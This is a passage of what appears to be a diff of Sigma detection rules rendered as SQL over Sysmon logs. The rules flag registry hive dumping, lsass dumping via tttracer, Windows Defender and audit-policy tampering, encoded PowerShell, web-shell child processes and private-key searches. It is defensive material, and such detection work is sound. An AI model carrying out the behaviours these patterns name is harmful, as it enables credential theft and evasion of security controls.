"Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." + "Legitimate administrators granting over permissive permissions to users" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\remote.exe' ESCAPE '\\' OR OriginalFileName = 'remote.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND CommandLine LIKE '% /G %' ESCAPE '\\' AND (CommandLine LIKE '%GR%' ESCAPE '\\' OR CommandLine LIKE '%GE%' ESCAPE '\\' OR CommandLine LIKE '%GW%' ESCAPE '\\' OR CommandLine LIKE '%GA%' ESCAPE '\\' OR CommandLine LIKE '%WP%' ESCAPE '\\' OR CommandLine LIKE '%WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_remote.yml" + "filename": "proc_creation_win_dsacls_abuse_permissions.yml" }, { - "title": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE", - "id": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", + "title": "PUA - Wsudo Suspicious Execution", + "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "status": "experimental", - "description": "Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts", + "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047" + "attack.privilege_escalation", + "attack.t1059" ], "falsepositives": [ "Unknown" ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentImage LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" + }, + { + "title": "WinDbg/CDB LOLBIN Usage", + "id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", + "status": "test", + "description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", + "tags": [ + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1218", + "attack.t1127" + ], + "falsepositives": [ + "Legitimate use of debugging tools" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '% qfe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cdb.exe' ESCAPE '\\' OR OriginalFileName = 'CDB.Exe') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -cf %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_hotfix.yml" + "filename": "proc_creation_win_lolbin_cdb.yml" }, { - "title": "Using AppVLP To Circumvent ASR File Path Rule", - "id": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", + "title": "Dumping of Sensitive Hives Via Reg.EXE", + "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", + "status": "test", + "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" + ], + "falsepositives": [ + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" + }, + { + "title": "Suspicious Obfuscated PowerShell Code", + "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", "status": "experimental", - "description": "Application Virtualization Utility is included with Microsoft Office. We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", - "author": "Sreeman", + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1218", - "attack.defense_evasion", - "attack.execution" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\appvlp.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\msoasb.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_appvlp.yml" + "filename": "proc_creation_win_powershell_encoded_obfusc.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference", - "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", + "title": "UtilityFunctions.ps1 Proxy Dll", + "id": "0403d67d-6227-4ea8-8145-4e72db7da120", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1216" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%UtilityFunctions.ps1%' ESCAPE '\\' OR CommandLine LIKE '%RegSnapin %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" + "filename": "proc_creation_win_lolbin_utilityfunctions.yml" }, { - "title": "Potential Arbitrary Code Execution Via Node.EXE", - "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "title": "Wab Execution From Non Default Location", + "id": "395907ee-96e5-4666-af2e-2ca91688e151", "status": "experimental", - "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_node_abuse.yml" + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" }, { - "title": "Tap Installer Execution", - "id": "99793437-3e16-439b-be0f-078782cf953d", - "status": "test", - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Potential DLL Sideloading Via DeviceEnroller.EXE", + "id": "e173ad47-4388-4012-ae62-bd13f71c18a8", + "status": "experimental", + "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "@gott_cyber", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\tapinstall.exe' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\OpenVPN Connect\\\\drivers\\\\tap\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Proton Technologies\\\\ProtonVPNTap\\\\installer\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\deviceenroller.exe' ESCAPE '\\' OR OriginalFileName = 'deviceenroller.exe') AND CommandLine LIKE '%/PhoneDeepLink%' ESCAPE '\\')" ], - "filename": "proc_creation_win_tapinstall_execution.yml" + "filename": "proc_creation_win_deviceenroller_dll_sideloading.yml" }, { - "title": "Psr.exe Capture Screenshots", - "id": "2158f96f-43c2-43cb-952a-ab4580f32382", - "status": "test", - "description": "The psr.exe captures desktop screenshots and saves them on the local machine", - "author": "Beyu Denis, oscd.community", + "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", + "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "status": "experimental", + "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1113" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate use by administrators to test software (should always be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Psr.exe' ESCAPE '\\' AND CommandLine LIKE '%/start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_psr_capture_screenshots.yml" + "filename": "proc_creation_win_reg_defender_tampering.yml" }, { - "title": "Suspicious Desktopimgdownldr Command", - "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", + "title": "Time Travel Debugging Utility Usage", + "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\tttracer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" }, { - "title": "Shells Spawned by Web Servers", - "id": "8202070f-edeb-4d31-a010-a26c72ac5600", + "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", + "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", "status": "test", - "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", - "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1190" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Particular web applications may spawn a shell process legitimately" + "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\at.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsget.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR Image LIKE '%\\\\find.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\hostname.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netdom.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\ver.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_spawn.yml" + "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" }, { - "title": "Changing Existing Service ImagePath Value Via Reg.EXE", - "id": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", + "title": "Private Keys Reconnaissance Via CommandLine Tools", + "id": "213d6a77-3d55-4ce8-ba74-fcfef741974e", "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1574.011" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '% ImagePath %' ESCAPE '\\' AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%.key%' ESCAPE '\\' OR CommandLine LIKE '%.pgp%' ESCAPE '\\' OR CommandLine LIKE '%.gpg%' ESCAPE '\\' OR CommandLine LIKE '%.ppk%' ESCAPE '\\' OR CommandLine LIKE '%.p12%' ESCAPE '\\' OR CommandLine LIKE '%.pem%' ESCAPE '\\' OR CommandLine LIKE '%.pfx%' ESCAPE '\\' OR CommandLine LIKE '%.cer%' ESCAPE '\\' OR CommandLine LIKE '%.p7b%' ESCAPE '\\' OR CommandLine LIKE '%.asc%' ESCAPE '\\') AND (((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%dir %' ESCAPE '\\') OR (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Get-ChildItem %' ESCAPE '\\') OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE'))" ], - "filename": "proc_creation_win_reg_service_imagepath_change.yml" + "filename": "proc_creation_win_susp_private_keys_recon.yml" }, { - "title": "Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32", - "id": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", - "status": "test", - "description": "Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Remote Access Tool - NetSupport Execution From Unusual Location", + "id": "37e8d358-6408-4853-82f4-98333fca7014", + "status": "experimental", + "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%,DllEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\client32.exe' ESCAPE '\\' OR Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=a9d50692e95b79723f3e76fcf70d023e%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_aptc12_bluemushroom.yml" + "filename": "proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" }, { - "title": "Webshell Hacking Activity Patterns", - "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "title": "Manage Engine Java Suspicious Sub Process", + "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", "status": "experimental", - "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or 